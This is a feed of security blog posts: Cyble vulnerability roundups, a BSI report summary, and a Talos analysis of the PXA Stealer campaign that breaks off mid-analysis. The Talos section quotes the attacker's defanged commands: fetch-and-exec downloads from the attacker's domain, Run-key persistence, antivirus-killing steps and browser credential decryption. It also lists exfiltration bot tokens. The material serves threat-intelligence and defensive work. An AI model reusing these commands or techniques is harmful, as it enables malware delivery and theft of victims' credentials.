Cyble IT Vulnerability Report: Microsoft Zero Days Under Attack

Vulnerabilities, Zero Days, Exploit, Report

A pair of actively exploited Microsoft zero-day vulnerabilities highlighted an active November Patch Tuesday, which also saw updates from several IT vendors.

Overview

Cyble Research and Intelligence Labs (CRIL) researchers investigated 22 vulnerabilities and eight dark web exploits from Nov. 6 to 12 and highlighted nine vulnerabilities that merit high-priority attention from security teams.

CRIL researchers also identified six dark web exploits that are at high risk in Cyble’s weekly IT vulnerability report to clients, which examined two Microsoft zero-days and vulnerabilities from Veeam, Cisco, HPE Aruba, D-Link, Citrix, and others.

Security teams should identify the vulnerabilities that are present in their environments and apply patches and mitigations promptly.

The Week’s Top IT Vulnerabilities

Here are the top IT vulnerabilities identified by Cyble threat intelligence researchers this week.

CVE-2024-43451 is an NTLM hash disclosure spoofing vulnerability found in all supported versions of Windows that has been exploited in the wild since at least April. Researchers disclosed this week that suspected Russian hackers exploited it for zero-day attacks targeting Ukrainian entities. The vulnerability was triggered by phishing emails that contained links to download a malicious Internet shortcut file, which, when interacted with, triggered the vulnerability to connect to a remote server and download malware.

CVE-2024-49039 is an elevation of privilege vulnerability in Windows Task Scheduler that has also been attacked. From a low-privilege AppContainer, an attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment, Microsoft said. A successful exploit could allow an attacker to execute RPC functions that are restricted to privileged accounts.

CVE-2024-49040 is a high-severity spoofing vulnerability in Microsoft Exchange Server that allows attackers to forge legitimate senders on incoming emails and makes malicious messages much more effective. A researcher reported a Proof of Concept (PoC) for this vulnerability, but Microsoft paused the update after some customers reported issues with Transport rules stopping periodically after the update was installed.

CVE-2024-40711 is a critical vulnerability in Veeam VBR (Veeam Backup & Replication) servers caused by the deserialization of untrusted data weakness that unauthenticated threat actors can exploit to gain remote code execution (RCE). Previously, the vulnerability was observed to be leveraged in Akira and Fog ransomware attacks. At present, researchers have observed that it is now exploited to deploy a newly identified strain of Frag ransomware.

CVE-2024-42509 and CVE-2024-47460 are command injection vulnerabilities in AOS-8 and AOS-10 versions of HPE Aruba’s network operating system. The flaw lies in the underlying CLI service, which could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba’s Access Point management protocol) UDP port (8211). Successful exploitation results in the ability to execute arbitrary code as a privileged user on the underlying operating system. Cyble researchers detailed the vulnerabilities and others in a separate blog.

CVE-2024-20418 is a critical vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points, which is a specialized software solution designed to provide robust and reliable wireless connectivity for industrial applications. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system of the affected device. Cyble also covered this vulnerability in a separate blog.

CVE-2024-10914 is a critical command injection vulnerability in end-of-life (EOL) D-Link network-attached storage (NAS) devices. Unauthenticated attackers can exploit it to inject arbitrary shell commands by sending malicious HTTP GET requests to vulnerable D-Link NAS devices exposed online. Researchers observed that attackers are exploiting the vulnerability with publicly available exploit codes.

CVE-2024-11068 is a critical incorrect use of privileged API vulnerability impacting the end-of-life D-Link DSL6740C modem. The vulnerability allows unauthenticated remote attackers to modify any user’s password by leveraging the API, thereby granting access to Web, SSH, and Telnet services using that user’s account. Since D-Link recently announced that it will not provide patches or updates for this EOL product, the vulnerability poses a significant risk to users.

Vulnerabilities and Exploits on Underground Forums

CRIL researchers also observed multiple Telegram channels and underground forums where threat actors shared or discussed exploits weaponizing vulnerabilities. Those vulnerabilities include:

CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. This vulnerability allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.

CVE-2024-50340: A high-security vulnerability affecting the Symfony PHP framework. The vulnerability allows an attacker to manipulate the application’s environment or debug mode by sending specially crafted query strings.

CVE-2024-8068 and CVE-2024-8069: These recently identified vulnerabilities in Citrix Session Recording pose significant security risks for Citrix environments. CVE-2024-8068 allows for privilege escalation to the NetworkService Account access level, and the vulnerability CVE-2024-8069 allows for limited remote code execution with the privileges of a NetworkService Account.

CVE-2024-47295: A high-severity vulnerability identified in the SEIKO EPSON Web Config allows a remote unauthenticated attacker to set an arbitrary administrator password on affected devices. The vulnerability results from an insecure initial password configuration in which the administrator password is left blank.

CRIL researchers also observed a threat actor discussing the critical vulnerability CVE-2023-38408, which affects 26 million internet-facing OpenSSH assets detected by Cyble. The vulnerability allows for remote code execution (RCE) when the SSH agent is forwarded to an attacker-controlled system.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Implement immutable, air-gapped, ransomware-resistant backup procedures for sensitive and critical data.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.

The post Cyble IT Vulnerability Report: Microsoft Zero Days Under Attack appeared first on Cyble.

Blog – Cyble – ​Read More

Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience

Germany, Cyber Resilience

Germany’s Federal Office for Information Security (BSI) recently released The State of Cybersecurity 2024 report, which illuminates the critical threats and advances in resilience across Germany’s digital landscape.

In a joint press briefing, Federal Minister of the Interior Nancy Faeser and BSI President Claudia Plattner said that while the cyberthreat landscape remains tense, resilience measures are proving effective in protecting businesses, institutions, and democratic processes.

Federal Minister Nancy Faeser noted the importance of cybersecurity for societal stability, stating, “Cybersecurity is central to our society and affects each and every one of us.” She highlighted that extortion, cyber espionage, and hybrid threats—especially from state-sponsored actors—continue to pose significant risks, necessitating robust cybersecurity investments to safeguard democratic institutions.

BSI President Claudia Plattner reinforced this stance, noting that Germany has witnessed increased resilience against cyber threats. However, she warned against complacency: “We must continue to increase our resilience in a nationwide effort.” Both leaders stressed the importance of swiftly incorporating the NIS-2 Directive into national law to fortify Germany’s cyber defenses.

Key Findings from BSI’s 2024 Report

Rising Threats from Malware and Ransomware Attacks

Between mid-2023 and mid-2024, an alarming increase in malware variants was recorded, with an average of 309,000 new variants discovered daily—a 26% increase over the previous year. Much of this rise is attributed to attacks targeting 64-bit Windows systems and an above-average increase in Android malware.

Malware, Ransomware, DDoS, Phishing, Germany
Figure 1 – Rising threats in Germany’s cyber threat landscape (Source: BSI)

Ransomware continues to be a significant challenge, especially for businesses and government institutions. Data leaks following ransomware attacks have increased, although the percentage of victims paying ransom has dropped. LockBit leads the list of the five most active groups targeting Germany. The group published 40 alleged leak victims on its leak site during the reporting period, followed by BlackBasta and 8Base.

Data Leak, Ransomware
Figure 2 – Top 5 Leak pages from July 2024 to June 2024 (Source: BSI)

Many organizations now rely on robust backup systems, reducing their dependency on attackers to restore encrypted data. BSI observed that transparent communication about cyber incidents has helped mitigate potential impacts, as other organizations can swiftly address and close similar vulnerabilities.

Advanced Persistent Threats (APT) and Cyber Espionage

Germany noted the surge in persistent threats from Advanced Persistent Threat (APT) groups, many of which are state-sponsored. Against a backdrop of geopolitical tension, these groups are increasingly targeting political parties, governmental agencies, and corporations for cyber espionage. Germany urged its public and private sectors to adopt proactive threat intelligence and protective measures to defend against these sophisticated, continuous attacks.

Cybersecurity for Elections: Ensuring Democratic Integrity

For German citizens, not only the European elections but also three state elections in Saxony, Thuringia, and Brandenburg and nine local elections took place. The BSI said the electoral process, communication by the authorities and the media, and the formation of opinion and will in the context of elections are now highly dependent upon information technology and are, therefore, at the center of information security.

BSI provided dedicated security oversight, working with electoral authorities to protect the integrity of the voting process. As Germany heads toward future elections, the BSI has enhanced its monitoring and support for political entities, prioritizing resilience against potential cyber threats and disinformation campaigns from state actors.

Emerging Cybersecurity Challenges

Increase in High-Volume DDoS Attacks

The first half of 2024 saw a substantial uptick in Distributed Denial of Service (DDoS) attacks, with a marked increase in high-volume attacks exceeding 10,000 Mbps. DDoS attacks not only disrupt services but are increasingly used to sow public uncertainty by exaggerating their impact on social media.

DDoS, cyberattack
Figure 3 – Proportion of High-Bandwidth DDoS attacks doubled in April 2024 (Source: BSI)

 The BSI recommends adopting advanced DDoS mitigation strategies, particularly for critical infrastructure, to withstand these escalating attack volumes.

Data Theft Targeting Consumers

Phishing remains a major threat to German citizens, with attackers expanding beyond financial institution impersonation to include popular streaming services. During 2024, phishing campaigns have increasingly targeted user data—such as credit card information and personal identifiers—via emails masquerading as communications from banks and entertainment platforms. The BSI advises consumers to stay vigilant and adopt robust identity protection measures to counter phishing attempts.

Strategic Initiatives to Strengthen Cyber Resilience

Cybernation Germany Initiative

The Cybernation Germany initiative, launched in early 2024, is a step towards a national commitment to building resilience and expanding Germany’s cybersecurity expertise. The initiative’s goals align with the NIS-2 Directive and the Cyber Resilience Act (CRA), which impose mandatory cybersecurity measures and incident reporting standards for companies. The CRA emphasizes a “security by design” approach, particularly for IoT devices, to bolster protections across interconnected networks.

This initiative demonstrates a concerted push from Germany towards enhanced threat intelligence, cyber resilience, and protective infrastructure.

Key Recommendations from BSI for Strengthening Cybersecurity

  1. Governance and Risk-Based Policies: Organizations should maintain updated, approved cybersecurity policies, leveraging threat intelligence to refine policies and prioritize high-risk threats.
  2. Enhanced Monitoring and Detection: With the rise in malware and ransomware, BSI recommends integrating Security Operations Centers (SOC) with continuous threat detection and red teaming exercises to effectively simulate real-world scenarios.
  3. Incident Response and Recovery: BSI encourages organizations to establish structured Incident Response plans, supported by Cyber Threat Intelligence (CTI), to reduce response times and facilitate efficient recovery from cyber incidents.
  4. Increased Public Awareness and Resilience Measures: Awareness campaigns, employee training, and enhanced communication strategies have proven effective in helping organizations and consumers defend against phishing and ransomware attacks.
  5. Collaboration with International Security Standards: Adhering to NIS-2 and the Cyber Resilience Act ensures that German entities align with European cybersecurity standards, enhancing cross-border protections and maintaining consistent security measures across sectors.

Conclusion: A Proactive Path Forward

The BSI’s 2024 report reaffirms Germany’s proactive approach to cybersecurity, emphasizing resilience, regulatory compliance, and advanced threat intelligence.

With heightened preparedness across government, businesses, and society, Germany is well-positioned to defend against increasingly sophisticated cyber threats. However, as Minister Faeser stated, the evolving cyber threat landscape necessitates continuous investment and adaptation to safeguard Germany’s critical infrastructure and democratic systems.

Germany’s Cybernation initiative and collaboration with international cybersecurity frameworks hint at a robust defense strategy that other nations can use as a model. By maintaining proactive measures, aligning with global security standards, and fostering a culture of resilience, Germany aims to ensure cybersecurity remains integral to its digital and democratic future.

References:

https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2024/241112_Lagebericht_2024.html

https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html

The post Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience appeared first on Cyble.

Blog – Cyble – ​Read More

Key Industrial Control System Vulnerabilities Identified in Recent CISA Advisories

ICS Vulnerabilities

Overview

Cyble Research & Intelligence Labs’ (CRIL) Weekly Industrial Control System (ICS) Vulnerability Intelligence Report has highlighted multiple security vulnerabilities disclosed by the Cybersecurity and Infrastructure Security Agency (CISA). 

These ICS vulnerabilities, which affect critical Industrial Control System components from Bosch Rexroth, Delta Electronics, and Beckhoff Automation, target unsuspecting users. With multiple vulnerabilities posing substantial risks to operational continuity, prompt patching and mitigation efforts are critical.

CISA issued three security advisories this week, each addressing several Industrial Control System vulnerabilities with varying severity. The vulnerabilities affect products integral to manufacturing, energy, and utilities. Cyble Research & Intelligence Labs has emphasized the need to prioritize patching certain vulnerabilities due to their potential impact on operational systems and the risk of exploitation by cyber adversaries.

The most concerning vulnerabilities include stack-based buffer overflow issues in Delta Electronics’ DIAScreen and a command injection vulnerability in Beckhoff Automation’s TwinCAT Control Package. If exploited, these vulnerabilities could lead to severe disruptions, including device crashes, remote code execution, and unauthorized command execution.

Detailed Vulnerability Analysis

The vulnerabilities identified this week are multiple products and vendors within the ICS environment. 

Bosch Rexroth – Uncontrolled Resource Consumption in IndraDrive Controllers

CVE-2024-48989 is a high-severity vulnerability affecting Bosch Rexroth’s AG IndraDrive FWA-INDRV*-MP* and IndraDrive Controllers. The vulnerability arises from uncontrolled resource consumption within the affected devices, which, if exploited, could lead to system instability or a denial of service (DoS) attack.

To mitigate this vulnerability, it is strongly recommended that organizations immediately apply the vendor’s patch. This will minimize the risk of exploitation and ensure the continued reliability and security of the affected devices.

Delta Electronics – Multiple Stack-Based Buffer Overflow Vulnerabilities in DIAScreen

The vulnerabilities identified as CVE-2024-47131, CVE-2024-39605, and CVE-2024-39354 are high-severity issues affecting Delta Electronics’ DIAScreen versions prior to v1.5.0. These vulnerabilities stem from buffer overflow issues within the system, which could cause the device to crash when exploited. If successfully attacked, remote adversaries could execute arbitrary code on the compromised device, potentially leading to a complete device compromise and significant operational downtime.

To mitigate the risks associated with these vulnerabilities, Delta Electronics has released patches that address the issue. Organizations using affected versions are strongly advised to upgrade to the latest software versions to protect their systems. Additionally, implementing network segmentation can help minimize the exposure of critical assets, further reducing the likelihood of successful exploitation.

Beckhoff Automation – Command Injection in TwinCAT Control Package

CVE-2024-8934 is a medium-severity vulnerability affecting the TwinCAT Control Package for versions prior to 1.0.603.0. This vulnerability arises from a command injection flaw, which could allow attackers to execute arbitrary commands within the system. If successfully exploited, this could compromise the underlying infrastructure, potentially impacting the security and stability of the affected systems.

To address this issue, organizations should upgrade to the latest version of the TwinCAT Control Package. This will effectively mitigate the vulnerability. Additionally, to further protect against exploitation, restricting access to the affected systems through network-level controls is advisable.

The vulnerabilities disclosed in this report demonstrate a concerning trend in the ICS vulnerability environment. The data from CISA reveals that a large proportion of the vulnerabilities affecting Industrial Control Systems (ICS) fall under critical or high-severity categories. Specifically, 50% of the identified vulnerabilities are classified as critical, while 30% are categorized as high severity.

In contrast, medium-severity vulnerabilities account for 15% of the total, while low-severity vulnerabilities make up just 5%. This distribution underscores the increasing risks posed by ICS vulnerabilities, highlighting the critical importance of implementing robust vulnerability management strategies to address and mitigate potential threats.

Recommendations for Mitigating ICS Vulnerabilities

To effectively manage and mitigate the risks associated with these vulnerabilities, the following steps are recommended:

  1. Organizations should follow the guidance provided by CISA and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly.
  2. Segregating ICS networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation.
  3. Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks.
  4. Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them. Engaging threat intelligence services and staying updated with CISA’s vulnerability intelligence reports is essential for proactive defense.
  5. Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise.

Conclusion

The ICS vulnerabilities highlighted by CISA demonstrate the rise of new risks targeting the industrial sector. By implementing comprehensive patch management strategies, enhancing network security, and staying informed about CISA’s vulnerability alerts, organizations can reduce their exposure to these risks and better protect their critical assets from potential exploitation.

Proactive measures such as regular security audits, network segmentation, and continuous monitoring will be essential for ensuring the ongoing safety and security of Industrial Control Systems and their associated networks.

The post Key Industrial Control System Vulnerabilities Identified in Recent CISA Advisories appeared first on Cyble.

Blog – Cyble – ​Read More

New PXA Stealer targets government and education sectors for sensitive information

  • Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.  
  • We discovered a new Python program called PXA Stealer that targets victims’ sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. 
  • PXA Stealer has the capability to decrypt the victim’s browser master password and uses it to steal the stored credentials of various online accounts.  
  • The attacker has used complex obfuscation techniques for the batch scripts used in this campaign. 
  • We discovered the attacker selling credentials and tools in the Telegram channel “Mua Bán Scan MINI,” which is where the CoralRaider adversary operates, but we are not sure if the attacker belongs to the CoralRaider threat group or another Vietnamese cybercrime group. 

Victimology and targeted information  

New PXA Stealer targets government and education sectors for sensitive information

The attacker is targeting the education sector in India and government organizations in European countries, including Sweden and Denmark, based on Talos telemetry data.  

The attacker’s motive is to steal the victim’s information, including credentials for various online accounts, browser login data, cookies, autofill information, credit card details, data from various cryptocurrency online and desktop wallets, data from installed VPN clients, gaming software accounts, chat messengers, password managers, and FTP clients.  

New PXA Stealer targets government and education sectors for sensitive information

Attacker’s infrastructure 

Talos discovered that the attacker was hosting malicious scripts and the stealer program on a domain, tvdseo[.]com, in the directories “/file”, “/file/PXA/”, “/file/STC/”, and “/file/Adonis/”. The domain belongs to a Vietnamese professional search engine optimization (SEO) service provider; however, we are not certain whether the attacker has compromised the domain to host the malicious files or has subscribed to get legitimate access while still using it for their malicious purposes. 

We found that the attacker is using the Telegram bot for exfiltrating victims’ data. Our analysis of the payload, PXA Stealer, disclosed a few Telegram bot tokens and the chat IDs – controlled by the attacker.  

Attackercontrolled Telegram bot token  

7545164691:AAEJ4E2f-4KZDZrLID8hSRSJmPmR1h-a2M4 

7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs 

Attackercontrolled Telegram chat IDs 

-1002174636072 

-1002150158011 

-4559798560 

-4577199885 

-4575205410 

Attacker’s underground activities 

We identified attacker’s Telegram account “Lone None,” which was hardcoded in the PXA Stealer program and analyzed various details of the account, including the icon of Vietnam’s national flag and a picture of the emblem for Vietnam’s Ministry of Public Security, which aligns with our assessment that the attacker is of Vietnamese origin. Also, we found Vietnamese comments in the PXA Stealer program, which further strengthen our assessment.  

New PXA Stealer targets government and education sectors for sensitive information 

New PXA Stealer targets government and education sectors for sensitive information 

The attacker’s Telegram account has biography data that includes a link to a private antivirus checker website that allows users or buyers to assess the detection rate of a malware program. This website provides a platform for potential threat actors to evaluate the effectiveness and stealth capabilities of the malware before purchasing it, indicating a sophisticated level of service and professionalism in the threat actor’s operations. 

New PXA Stealer targets government and education sectors for sensitive information

We also discovered that the attacker is active in an underground Telegram channel, “Mua Bán Scan MINI,” mainly selling Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundry data. Talos observed that this Vietnamese actor is also seen in the Telegram group in which the CoralRaider actor operates. However, we are not certain whether the actor is a member of the CoralRaider gang or another Vietnamese cybercrime group.  

Talos discovered that the attacker is also promoting another underground Telegram channel, “Cú Black Ads – Dropship,” by sharing a few automation tools to manage large numbers of user accounts in their channel and conducting the exchanging or selling of information related to social media accounts, proxy services, and a batch account creator tool.  

New PXA Stealer targets government and education sectors for sensitive information 

New PXA Stealer targets government and education sectors for sensitive information 

The tools shared by the attacker in the group are automated utilities designed to manage several user accounts. These tools include a Hotmail batch creation tool, an email mining tool, and a Hotmail cookie batch modification tool. The compressed packages provided by the threat actor often contain not only the executable files for these tools but also their source code, allowing users to modify them as needed.  

New PXA Stealer targets government and education sectors for sensitive information
Hotmail batch creation tool from telegram channel.
New PXA Stealer targets government and education sectors for sensitive information
Hotmail cookie batch modification tool from telegram channel. 

We found that the attacker is not sharing all the tools for free, and some of them require users to send a unique key back to the Telegram channel administrator for software activation. This process ensures that only those who have been vetted or have paid for the tool can access its full functionality.  We also discovered that these tools are distributed on other websites, such as aehack[.]com, highlighting that they are selling the tools. Additionally, a YouTube channel exists that provides tutorials on how to use these tools, further facilitating their widespread use and demonstrating the organized efforts to market and instruct potential users on their application. 

New PXA Stealer targets government and education sectors for sensitive information

Infection Chain

New PXA Stealer targets government and education sectors for sensitive information

The attacker gains initial access by sending a phishing email with a ZIP file attachment, according to our telemetry data. The ZIP file contains a malicious loader executable file compiled in Rust language and a hidden folder called Photos. The hidden folder has other recurring folders, such as Documents and Images, that contain obfuscated Windows batch scripts and a decoy PDF document. 

New PXA Stealer targets government and education sectors for sensitive information

When a victim extracts the attachment ZIP file, the hidden folder and the malicious Rust loader executable are dropped onto the victim machine. When the malicious Rust loader executable is run by the victim, it loads and executes multiple obfuscated batch scripts that are in the dropped hidden folders.   

We deobfuscated the Windows batch scripts using CyberChef, with each step in the process being crucial and requiring precise execution to achieve accurate deobfuscation. First, we employed regular expressions (regex) to filter out random characters consisting of uppercase and lowercase letters (A to Z). These random strings ranged in length from six to nine characters and were enclosed within “%” symbols. Next, we filtered out the “^” symbols and removed any remaining uppercase and lowercase letters (A to Z) as well as special characters “_,” /’(?),” “$,” “#,” and “[].”  Finally, we eliminated the “%” symbols and we were able to successfully deobfuscate the scripts and reveal their PowerShell commands. 

Snippet of the obfuscated batch script 

Snippet of the deobfuscated batch script 

New PXA Stealer targets government and education sectors for sensitive information 

New PXA Stealer targets government and education sectors for sensitive information 

The batch scripts execute PowerShell commands simultaneously, performing the following activities on the victim machine: 

  • Opens a decoy PDF document of a Glassdoor job application form. 
New PXA Stealer targets government and education sectors for sensitive information
  • Downloads a portable Python 3.10 package archive masquerading as “synaptics.zip”, which is hosted on the attacker-controlled domain through the hardcoded URL “hxxps[://]tvdseo[.]com/file/synaptics[.]zip”, and saves it in the user profile’s temporary folder as well as in the public user’s folder with the random file names and extracts them. 

C:WINDOWSsystem32cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', [System[.]IO[.]Path]::GetTempPath() + 'EAnLaxUKaI[.]zip') 
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', 'C:UsersPublicoZHyMUy4qk[.]zip')  
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo $dst = [System[.]IO[.]Path]::Combine([System[.]Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force $dst* } else { New-Item -ItemType Directory -Force $dst } ; [System[.]IO[.]Compression[.]ZipFile]::ExtractToDirectory([System[.]IO[.]Path]::Combine([System[.]IO[.]Path]::GetTempPath(), 'EAnLaxUKaI[.]zip'), $dst)  
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; [System[.]IO[.]Compression[.]ZipFile]::ExtractToDirectory('C:/Users/Public/oZHyMUy4qk[.]zip', 'C:/Users/Public/oZHyMUy4qk')  

  • Then, it creates and runs a Windows shortcut file with the file name “WindowsSecurity.lnk”, configuring a base64-encoded command as a command line argument in the user profile’s temporary folder and configures the “Run” registry key with the path of the shortcut file to establish persistence. 

C:WINDOWSsystem32cmd[.]exe /S /D /c echo $s = $payload = import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='));$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut($env:LOCALAPPDATAWindowsSecurity.lnk);$link.WindowStyle = 7;$link.TargetPath = $env:LOCALAPPDATAEAnLaxUKaIsynaptics.exe;$link.IconLocation = C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe,13;$link.Arguments = -c `$payload`";$link.Save()  
  
C:WINDOWSsystem32cmd[.]exe /S /D /c echo New-ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'Windows Security' -PropertyType String -Value 'C:WindowsExplorer.EXE C:UsersMarsiAppDataLocalWindowsSecurity.lnk' -Force 

  • The Windows shortcut file with a single-line Python script using a disguised portable Python executable downloads a base64-encoded Python program from a remote server. The downloaded program contains instructions to disable the antivirus programs on the victim’s machine.  

cmd[.]exe  /c start "" /min C:UsersPublicoZHyMUy4qksynaptics[.]exe -c "import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_PURE_ENC')[.]read()[.]decode('utf-8')))" 

  • Next, the batch script continues to execute another PowerShell command that downloads the PXA Stealer Python program and executes it with the masqueraded portable Python executable “synaptics.exe” on the victim’s machine.  

cmd[.]exe /c start  /min C:UsersPublicoZHyMUy4qksynaptics[.]exe -c import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT')[.]read()[.]decode('utf-8'))) 

  • Another batch script called “WindowsSecurity.bat” is dropped in the Windows startup folder of the victim’s machine to establish persistence, which has the command to download and execute the PXA Stealer Python program shown in the earlier paragraph.  

PXA Stealer targets victims’ sensitive data 

PXA Stealer is a Python program that has extensive capabilities targeting a variety of data on the victim’s machine.   

When the PXA Stealer is executed, it kills a variety of processes from a hardcoded list, including endpoint detection software, network capture and analysis process, VPN software, cryptocurrency wallet applications, file transfer client applications, and web browser and instant messaging application processes by executing “task kill” commands.  

New PXA Stealer targets government and education sectors for sensitive information
Detection evasive function of PXA Stealer. 

The stealer has the capability of decrypting the browser master key, which is a cryptographic key used by web browsers like Google Chrome and other Chromium-based browsers to protect sensitive information, including stored passwords, cookies, and other data in an encrypted form on the local system. The stealer accesses the master key file “Local State” located in the browser folder of the user’s profile directory, which contains the information of the encryption key used to encrypt the user data stored in the “Login Data” file, and decrypts it using the “CryptUnprotectData” function. This allows the attacker to gain access to the stored credentials and other sensitive browser information.   

New PXA Stealer targets government and education sectors for sensitive information
Browser master key decryption function of PXA Stealer. 

The stealer also attempts to decrypts the master key that is stored in the key4.db file. Key4.db is a database used by Firefox (and some other Mozilla-based browsers) to store encryption keys, particularly the master key that encrypts sensitive data, such as saved passwords. The “getKey” function of the stealer is designed to extract and decrypt keys from the key4.db file using either AES or 3DES encryption methods, depending on the encryption used in the stored key. 

New PXA Stealer targets government and education sectors for sensitive information
Browser master key decryption function of PXA Stealer. 

The stealer attempts to retrieve user profiles paths from the profiles.ini file of browser applications, including Mozilla Firefox, Pale Moon, SeaMonkey, Waterfox, Mercury,  k-Melon, IceDragon, Cyberfox, and BlackHaw for further processing, such as extracting saved passwords or other user data. 

New PXA Stealer targets government and education sectors for sensitive information

The stealer collects the victim’s login information from the browser’s login data file. The function “get_ch_login_data” of the stealer extracts login data, including URLs, usernames, and passwords, from the database “login_db”, which stores login information. The extracted login information is formatted into a string that includes the URL, username, decrypted password, browser, and profile.  

For each login entry in the browser login database, the function checks if the URL contains any important keywords that are hardcoded in the stealer program, and if a match is found, the login information is saved in a separate file named “Important_Logins.txt” located in the “Browsers Data” folder within the user’s profile temporary directory. The function saves all the results to “All_Passwords.txt” in the “Browsers Data” folder for other login data found in the database. 

New PXA Stealer targets government and education sectors for sensitive information
Login credentials stealer function of PXA Stealer. 

The stealer executes another function, “get_ch_cookies”, to extract cookies from a specified browser’s cookie database, decrypt them, and save the results to a file. First, it checks if the cookies database file exists in the specified profile directory and unlocks the cookies database file. The database file is then copied to the temporary folder and is processed by executing an SQL query to retrieve cookie information, including host key, name, path, encrypted value, expiration time, secure flag, and HTTP-only flag from the cookies database file.  

If any Facebook cookies are found, they are concatenated to a single string called “fb_formatted”, and it calls another function, “ADS_Checker()”, to check for ads based on the Facebook cookies, and the results are written to a file called “Facebook_Cookies.txt”.  Any other cookie information is written to a text file named after the browser and the profile. Finally, the function removes the temporary cookie database file. 

New PXA Stealer targets government and education sectors for sensitive information
Browser cookies stealer function of PXA Stealer. 

In another sample of the stealer, for the browsers Chrome, Chrome SxS, and Chrome(x86), it downloads and executes a cookie stealer JavaScript through the URL hxxps://tvdseo[.]com/file/PXA/Cookie_Ext.zip. The cookie stealer JavaScript connects to the Telegram bot with the token, and the chat ID hardcoded in the script collects the cookies and sends them to the attacker’s Telegram bot through the POST method.  

New PXA Stealer targets government and education sectors for sensitive information
Browser cookie stealer JavaScript.

Next, the stealer targets the victim’s credit card information stored in the browser database “webappsstore.sqlite”. The function extracts and decrypts saved credit card information from a browser’s web data database. It checks if the cards database file “cards_db” exists and copies them to the user’s profile temporary folder. It executes a SQL query to retrieve credit card information including name on card, expiration month/year, encrypted card number, and date modified. Then it decrypts the encrypted card number using the function “decrypt_ch_value” with the help of the decrypted master key. It writes the cards’ information to a text file and names it after the browser and the profile. Finally, it gets the count of credit card information that was found and deletes the temporary copy of the “cards_db” file.  

New PXA Stealer targets government and education sectors for sensitive information
Credit card data stealer function of PXA Stealer. 

The stealer extracts and saves the autofill form data from a browser’s database to a text file with the file name format of “$browser_$profile.txt” in a folder called “AutoFills” in browser profile location.  

